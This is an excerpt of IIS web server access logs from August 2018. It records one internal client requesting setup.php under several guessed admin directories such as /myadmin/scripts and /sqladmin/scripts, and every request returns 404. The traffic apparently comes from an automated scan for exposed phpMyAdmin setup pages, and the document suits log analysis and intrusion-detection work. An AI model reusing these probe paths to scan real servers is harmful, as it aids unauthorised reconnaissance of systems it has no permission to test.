Mozilla/7.0+(compatible;+MSIE+8.0;+Windows+Seven) - - 404 3 1869 249 15 2018-08-15 23:48:07 W3SVC1397 W2K3WEB3 192.168.25.12 GET /myadmin/scripts/setup.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/7.0+(compatible;+MSIE+8.0;+Windows+Seven) - - 404 3 1869 246 0 2018-08-15 23:48:07 W3SVC1397 W2K3WEB3 192.168.25.12 GET /MyAdmin/scripts/setup.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/7.0+(compatible;+MSIE+8.0;+Windows+Seven) - - 404 3 1869 246 0 2018-08-15 23:48:08 W3SVC1397 W2K3WEB3 192.168.25.12 GET /db/scripts/setup.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/7.0+(compatible;+MSIE+8.0;+Windows+Seven) - - 404 3 1869 241 0 2018-08-15 23:48:08 W3SVC1397 W2K3WEB3 192.168.25.12 GET /sqladmin/scripts/setup.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/7.0+(compatible;+MSIE+8.0;+Windows+Seven) - - 404 3 1869 247 0 2018-08-15 23:48:08 W3SVC1397 W2K3WEB3 192.168.25.12 GET /setup.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/7.0+(compatible;+MSIE+8.0;+Windows+Seven) - - 404 2 1869 230 0